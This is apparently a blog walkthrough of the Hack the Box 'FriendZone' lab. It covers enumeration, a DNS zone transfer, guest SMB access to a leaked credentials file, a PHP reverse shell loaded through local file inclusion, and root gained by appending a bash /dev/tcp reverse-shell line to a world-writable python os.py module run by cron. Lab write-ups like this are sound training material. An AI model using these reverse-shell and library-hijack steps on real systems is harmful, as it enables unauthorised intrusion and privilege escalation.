3 min read

Hack the Box - FriendZone

Hi there, this is FriendZone machine walkthrough. An easy box but so much fun from this box.

Information

  • OS: Linux
  • IP: 10.10.10.123
  • Difficulty: Easy

Enumeration

Let's start with nmap xD.

$ nmap -sV -sC -A -Pn 10.10.10.123
Starting Nmap 7.30 ( https://nmap.org ) at 2019-06-06 23:14 KST
Nmap scan report for 10.10.10.123
Host is up (0.30s latency).
Not shown: 993 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|_  256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
53/tcp  open  domain
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_ssl-date: ERROR: Script execution failed (use -d to debug)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -0s, deviation: 0s, median: -0s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2019-06-06T17:14:52+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

Post-scan script results:
| clock-skew: 
|_  -0s: Majority of systems scanned
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.41 seconds

The most interested services to me were:

  1. FTP Server was running but username and password required.
  2. HTTP and HTTPS were running too xD
  3. This server was also used as DNS Server with doamin friendzone.red.
  4. Samba file server was running and also allow for guest user xD

Check HTTP and HTTPS port

For http://10.10.10.123 I found this

FriendZone web

But for https://10.10.10.123 was a Not Found page of Apache.

However there was a email on the page info@friendzoneportal.red. From the result of NMAP scan and this email address, I thought the server had 2 domains, friendzone.red and friendzoneportal.red. So, I added these to my /etc/hosts file.

10.10.10.123 friendzone.red
10.10.10.123 friendzoneportal.red

Now open the webiste again using this domain. The HTTP pages showed the same result, but I tried HTTPS and found these.

https://friendzone.red

FriendZone web

https://friendzoneportal.red

FriendZone web

Page source code didn't have any intesting hint. There were only that 2 GIF images.

Check for sub domains

I used dig command to check if any sub domains existed (because port 53 was opened) and yeahh, it existed xD

$ dig axfr friendzone.red @10.10.10.123                                                                                                     
; <<>> DiG 9.10.6 <<>> axfr friendzone.red @10.10.10.123
;; global options: +cmd
friendzone.red.		604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.		604800	IN	AAAA	::1
friendzone.red.		604800	IN	NS	localhost.
friendzone.red.		604800	IN	A	127.0.0.1
administrator1.friendzone.red. 604800 IN A	127.0.0.1
hr.friendzone.red.	604800	IN	A	127.0.0.1
uploads.friendzone.red.	604800	IN	A	127.0.0.1
friendzone.red.		604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 377 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Thu Jun 06 23:25:01 KST 2019
;; XFR size: 8 records (messages 1, bytes 261)
$ dig axfr friendzoneportal.red @10.10.10.123
; <<>> DiG 9.10.6 <<>> axfr friendzoneportal.red @10.10.10.123
;; global options: +cmd
friendzoneportal.red.	604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red.	604800	IN	AAAA	::1
friendzoneportal.red.	604800	IN	NS	localhost.
friendzoneportal.red.	604800	IN	A	127.0.0.1
admin.friendzoneportal.red. 604800 IN	A	127.0.0.1
files.friendzoneportal.red. 604800 IN	A	127.0.0.1
imports.friendzoneportal.red. 604800 IN	A	127.0.0.1
vpn.friendzoneportal.red. 604800 IN	A	127.0.0.1
friendzoneportal.red.	604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 511 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Thu Jun 06 23:25:25 KST 2019
;; XFR size: 9 records (messages 1, bytes 281)

I added those domains in A record to my /etc/hosts file.

10.10.10.123 administrator1.friendzone.red
10.10.10.123 hr.friendzone.red
10.10.10.123 uploads.friendzone.red
10.10.10.123 admin.friendzoneportal.red
10.10.10.123 files.friendzoneportal.red
10.10.10.123 imports.friendzoneportal.red
10.10.10.123 vpn.friendzoneportal.red

Access to web page via domain name

There were 2 admin domains:

  • administrator1.friendzone.red

administrator1.friendzone.red

  • admin.friendzoneportal.red

admin.friendzoneportal.red

I tried do some SQL Injection but it didn't working and the page admin.friendzoneportal.red showed a message that "Admin page is not developed yet !!! check for another one". So I thought only the first domain will work.

Let check SMB server

As the result from NMAP Scan that the SMB was running and allow guest user, so I tried to connect to that file server as guest user.

SMB Login

![SMB folder](htb-friendzone-7.png

There were 3 volumes but after tried to mount, only 2 were able to mount.

SMB Development Folder

Lol, I found some php shell files here. It was such a hint from other player xD. I checked for the folder permission and it was read/write access.

And in general volume I found a creds.txt file which was a credential for admin.

SMB general folder

creds for the admin THING:
admin:WORKWORKHhallelujah@#

Check admin webpage again xD

I used this credential to login to https://administrator1.friendzone.red and it showed a message like this.

Login Done ! visit /dashboard.php

So, now check https://administrator1.friendzone.red/dashboard.php

FriendZone admin

The beginner php developer of this page told us to add some params to the url to show the image. Haha, let's try...

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp

FriendZone admin

I have looked around and nothing found. I only could change the image name a.jpg and b.jpg. But what is that param pagename???

As I found some php shell files inside shared folder Development, I thought that it must be a Local File Inclusion to the param pagename. So we have to know the real path of the shared volumne Development on the server.

NMAP with SMB enum shared script

I searched google for smb enum and I found smb-enum-shared script for NMAP. So, I started do nmap again.

$ nmap --script smb-enum-shares -p139 10.10.10.123
Starting Nmap 7.30 ( https://nmap.org ) at 2019-06-07 16:45 KST
Nmap scan report for friendzone.red (10.10.10.123)
Host is up (0.49s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   Development: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 3
|     Max Users: <unlimited>
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   Files: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files /etc/Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\hole
|     Anonymous access: <none>
|     Current user access: <none>
|   IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   general: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\general
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

Nmap done: 1 IP address (1 host up) scanned in 92.14 seconds

I could see that Development shared volumne was stored on path /etc/Development.

Get access to the machine

Now I created a reverse shell file named a.php and copied to that shared volumne. I started running my netcat listener for that reverse shell and tried to execute reverse shell using filename param on admin website.

My a.php file should be at /etc/Development/a.php. By using Local File Inclusion technique, I opened it as

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Developement/a

I didn't use extension .php because the sample of pagename=timestamp.

And my reverse shell listener

$ netcat -lvnp 1234
Connection from 10.10.10.123:54510
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 17:37:35 up 34 min,  0 users,  load average: 2.85, 4.84, 5.16
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ls /home
friend
$ cd /home/friend
$ ls
user.txt
$ cat user.txt
a9****************************11
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@FriendZone:/home/friend$ 

In /var/www/ I found mysql_data.conf file which was the user and password of database.

www-data@FriendZone:/home/friend$ cd /var/www
www-data@FriendZone:/var/www$ ls
admin	    friendzoneportal	   html		    uploads
friendzone  friendzoneportaladmin  mysql_data.conf
www-data@FriendZone:/var/www$ cat mysql_data.conf
for development process this is the mysql creds for user friend

db_user=friend

db_pass=Agpyu12!0.213$

db_name=FZ

So, I tried ssh to the machine using that password.

$ ssh friend@10.10.10.123                                                           Chhaileng@Chhailengs-MacBook-Pro
friend@10.10.10.123's password: 
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

You have mail.
Last login: Fri Jun  7 10:34:26 2019 from 10.10.12.75
friend@FriendZone:~$ 

And I got the fully interactive TTY shell.

Root

After got a shell on the box, I uploaded pspy64 to the box and excuted the binary. And this is what I noticed.

pspy

Script reporter.py was run by root. I kept tracking that process and saw that script was run by cron every a few minutes. This is what inside the reporter.py script. Most lines of code were commented, but there was a import os line which import library from python 2.7.

friend@FriendZone:/opt/server_admin$ cat reporter.py
#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer

I went to library directory which is /usr/lib/python2.7. The interested thing was that python2.7 directory was allowed with full permission.

friend@FriendZone:/usr/lib$ ls -la | grep python2
drwxrwxrwx 27 root root  16384 Jun 26 14:27 python2.7

Also the file os.py.

friend@FriendZone:/usr/lib/python2.7$ ls -la | grep os.py
-rwxrwxrwx  1 root     root      25876 Jun 26 14:32 os.py

Since the reporter.py was always run by root and call os python module, I injected some code to execute the reverse shell in os.py at the end.

system("bash -c 'bash -i &>/dev/tcp/10.10.12.78/1234 0<&1'")

I also ran the netcat listener for this reverse shell and wait for cronjob execute the script.

And I got a root shell.

$ nc -lvnp 1234
Connection from 10.10.10.123:54546
bash: cannot set terminal process group (3435): Inappropriate ioctl for device
bash: no job control in this shell
root@FriendZone:~# id
uid=0(root) gid=0(root) groups=0(root)
root@FriendZone:~# ls  
certs
root.txt
root@FriendZone:~# cat root.txt
b0****************************c7
root@FriendZone:~# 

Rooted, and I hope you enjoy this xD

SHARE THIS POST